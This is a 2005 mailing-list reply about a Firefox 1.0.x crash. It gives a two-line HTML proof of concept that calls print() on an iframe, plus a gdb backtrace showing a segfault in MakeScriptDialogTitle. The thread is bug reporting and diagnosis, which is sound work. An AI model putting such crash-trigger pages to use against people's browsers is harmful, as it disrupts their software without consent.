Hi, This works in my Debian Box with 1.0.2: $ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/ $ cat test.html <html> <body><iframe id="pocframe" name="pocframe" src=""></iframe> <script type="text/javascript"> window.frames.pocframe.print(); </script> </body> </html> $ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/ $ gdb /usr/lib/mozilla-firefox/firefox-bin GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. (...) (gdb) run ~/tmp/test/test.html Starting program: /usr/lib/mozilla-firefox/firefox-bin ~/tmp/test/test.html (no debugging symbols found) (...) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1220601760 (LWP 17803)] 0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle () (gdb) where #0 0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle () #1 0xb7f46635 in XPTC_InvokeByIndex () from /usr/lib/mozilla-firefox/libxpcom.so #2 0x083718ae in XPCWrappedNative::CallMethod () #3 0x08377f21 in XPC_WN_CallMethod () #4 0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so #5 0xb7fab51d in js_Interpret () from /usr/lib/mozilla-firefox/libmozjs.so #6 0xb7fa1bcc in js_Execute () from /usr/lib/mozilla-firefox/libmozjs.so #7 0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/mozilla-firefox/libmozjs.so #8 0x088bd382 in nsJSContext::EvaluateString () #9 0x0869341a in nsScriptLoader::EvaluateScript () #10 0x08693092 in nsScriptLoader::ProcessRequest () #11 0x08692c79 in nsScriptLoader::IsScriptEventHandler () #12 0x088896d3 in nsHTMLScriptElement::MaybeProcessScript () #13 0x08657d2f in nsGenericElement::AppendChildTo () #14 0x086c9765 in HTMLContentSink::ProcessSCRIPTTag () #15 0x086c7130 in HTMLContentSink::Init () #16 0x0849961e in CNavDTD::AddLeaf () #17 0x084977ae in CNavDTD::HandleScriptToken () #18 0x08498f59 in CNavDTD::OpenContainer () #19 0x08495cbf in CNavDTD::HandleDefaultStartToken () #20 0x08496936 in CNavDTD::HandleStartToken () #21 0x08494fcb in CNavDTD::BuildNeglectedTarget () #22 0x08494674 in CNavDTD::~CNavDTD () #23 0x084aae6d in nsParser::ResumeParse () #24 0x084aabc0 in nsParser::ResumeParse () #25 0x084abe85 in nsParser::DetectMetaTag () #26 0x08908acd in nsDocumentOpenInfo::Open () #27 0x0840966a in nsFileChannel::EnsureStream () #28 0x083c6acb in nsInputStreamPump::OnStateTransfer () #29 0x083c692f in nsInputStreamPump::EnsureWaiting () #30 0xb7f14c21 in nsInputStreamReadyEvent::EventHandler () from /usr/lib/mozilla-firefox/libxpcom.so #31 0xb7f2b297 in PL_HandleEvent () from /usr/lib/mozilla-firefox/libxpcom.so #32 0xb7f2b1c4 in PL_ProcessPendingEvents () from /usr/lib/mozilla-firefox/libxpcom.so #33 0xb7f2ce59 in nsEventQueueImpl::NotifyObservers () from /usr/lib/mozilla-firefox/libxpcom.so #34 0x08568735 in nsBaseWidget::FreeNativeData () #35 0xb7a04dbf in g_vasprintf () from /usr/lib/libglib-2.0.so.0 #36 0xb79df582 in g_main_depth () from /usr/lib/libglib-2.0.so.0 #37 0xb79e05f8 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0 #38 0xb79e0930 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0 #39 0xb79e0ed3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0 #40 0xb7c828f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0 #41 0x08568a78 in nsAppShell::ReleaseGlobals () #42 0x08a0e8d4 in nsAppShellService::AttemptingQuit () #43 0x08c13800 in xre_main () #44 0x0834af24 in main () This is a simple bug in Firefox. Bye, Joxean Koret On Tue, 2005-05-10 at 20:38 +0000, orebla Orebla wrote: > > I have found this script in turn for the net and it sends to me in crash > Firefox: > > <!--PROOF OF CONCEPT > The vulnerability can be exploited with the following 2 lines of code: > > <iframe id="pocframe" name="pocframe" src="about:blank"></iframe> > <script > type="text/javascript">window.frames.pocframe.print();</script> > --> > > I have WinXP SP2 e Firefox 1.0.3. > > Why firefox crash??? > > PS: I do not have uncovered the vulnerability. Sorry for the English... > :-) -- ------ El primer pecado de la humanidad fue la fe; la primera virtud, la duda.
Attachment:
signature.asc
Description: This is a digitally signed message part